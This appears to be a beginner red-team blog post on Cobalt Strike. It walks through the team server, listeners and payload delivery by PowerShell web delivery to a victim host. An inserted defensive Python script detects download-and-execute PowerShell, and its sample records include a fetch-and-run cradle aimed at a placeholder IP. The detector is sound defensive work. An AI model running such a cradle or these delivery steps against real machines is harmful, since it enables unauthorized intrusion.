Getting started with Cobalt Strike

As an aspiring Red Teamer, I’ve recently started playing with Cobalt Strike, so I thought it would be a good idea to start a series of blog posts on using it and its many features. As some of you may be aware, Cobalt Strike is software for Adversary Simulations and Red Team Operations.

More information can be found here: https://www.cobaltstrike.com

In this first post, I will quickly go through how to get Cobalt Strike up and running on your system, create a listener and interact with a victim’s machine. This will be short and to the point. 🙂

If you haven’t used Cobalt Strike before, I’m going to presume that you haven’t got a full licensed copy. A trial copy can be requested at the following URL:

https://trial.cobaltstrike.com/

Installation and setup can be found here:

https://www.cobaltstrike.com/support

Once you have your trial copy downloaded and the prerequisites installed, you can begin.

Starting the team server

From within the Cobalt Strike directory, type the following command to start the team server. 192.168.0.12 is the IP address of my Kali Linux system. Note: The password can be anything you desire.

./teamserver <IP Address> <password>

Starting Cobalt Strike

Type the following command to start the Cobalt Strike user interface:

./cobaltstrike

Connecting to the team server

Once you have started Cobalt Strike, you are required to connect to your team server. Fill in the details including the password you set when starting the team server. The User field can be anything you want. Use your super cool hacker handle here. ;P

Cobalt Strike’s user interface

Once connected, you will be presented with the Cobalt Strike user interface where you will interact with your agents and do all sorts of other cool stuff.

Creating a listener

You will be required to create a listener for your compromised machines to connect to. Simply click Cobalt Strike – Listeners.

Once the Listeners tab has loaded, click Add.

Give the listener a name; in this case, I called it “C2”. Select your desired payload, ensure the IP address is correct (team server IP) and choose a port to listen on.

Here you can input a domain name that points to your team server. We will use an IP address in this case.

The listener has been created and can be viewed, deleted, etc. from the Listeners tab.

Delivering the payload

We are now going to quickly compromise a host and have it connect to our team server in order to interact with it.

Select Attacks – Web Drive-by – Scripted Web Delivery.

This will provide us with a PowerShell one-liner to run on the victim host.

Here we select the options to configure our quick web server to host and deliver the PowerShell one-liner.

Copy the URL provided.

Switch over to the victim’s machine and paste in the PowerShell one-liner. Just to be clear, this is for demonstration purposes. In reality, the payload would be delivered to the victim via some sort of social engineering attack.
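
From the defender's side, running a PowerShell one-liner like this shows up in process-creation logging on the victim host. The triage sketch below is an added example, not part of the original post and not Cobalt Strike's own code. It assumes records are (image path, command line) pairs from command-line auditing; the sample records, the 192.0.2.10 address and the patterns (a generic download-and-execute shape, since the post does not show the generated one-liner) are constructed for illustration.

```python
import base64
import re

DOWNLOAD = re.compile(r"downloadstring|downloaddata|net\.webclient|invoke-webrequest|\biwr\b", re.I)
EXECUTE = re.compile(r"\biex\b|invoke-expression", re.I)
HIDDEN = re.compile(r"\s-w(?:in\w*)?\s+(?:hidden|1)\b", re.I)
NOPROFILE = re.compile(r"\s-nop\w*", re.I)
ENCODED = re.compile(r"\s-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
POWERSHELL = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", re.I)

def expand_encoded(cmdline):
    """Append the decoded -EncodedCommand text (base64 of UTF-16LE), if any."""
    match = ENCODED.search(cmdline)
    if not match:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad base64 or not UTF-16LE: keep the raw command line
        return cmdline

def classify(image, cmdline):
    """Return (verdict, reasons) for one process-creation record."""
    if not POWERSHELL.search(image):
        return "ignore", []
    text = expand_encoded(cmdline)
    checks = [("encoded", ENCODED.search(cmdline)), ("download", DOWNLOAD.search(text)),
              ("in-memory-exec", EXECUTE.search(text)), ("hidden-window", HIDDEN.search(text)),
              ("no-profile", NOPROFILE.search(text))]
    reasons = [name for name, hit in checks if hit]
    if "download" in reasons and "in-memory-exec" in reasons:
        return "alert", reasons  # fetched content is executed without touching disk
    if "download" in reasons or "hidden-window" in reasons or "encoded" in reasons:
        return "review", reasons
    return "ok", reasons

# Constructed sample records (image path, command line); none come from the post.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
SAMPLES = [
    (PS, 'powershell.exe -nop -w hidden -c "' + CRADLE + '"'),
    (PS, "powershell.exe -nop -w hidden -enc " + base64.b64encode(CRADLE.encode("utf-16-le")).decode()),
    (PS, r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
    (PS, 'powershell.exe -c "Invoke-WebRequest https://example.test/t.zip -OutFile t.zip"'),
    (r"C:\Windows\System32\cmd.exe", "cmd.exe /c ipconfig /all"),
]

if __name__ == "__main__":
    for image, cmdline in SAMPLES:
        print(classify(image, cmdline), cmdline[:60])
```

String matching of this kind misses obfuscated commands, so treat a hit as one signal to correlate with PowerShell script block logging and outbound network telemetry.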

Interacting with the victim host

Once the PowerShell one-liner is executed, the victim will connect to the team server and be available for interaction.

To interact with the host, right click on the compromised host and click Interact.

For demonstration, I typed the following command:

beacon> shell ipconfig /all

Hopefully this gave you some insight on how easy it is to get started with Cobalt Strike. There will be many more blog posts surrounding this excellent product.

If you’re itching to learn more, I’d recommend reading through the Cobalt Strike manual: https://www.cobaltstrike.com/downloads/csmanual39.pdf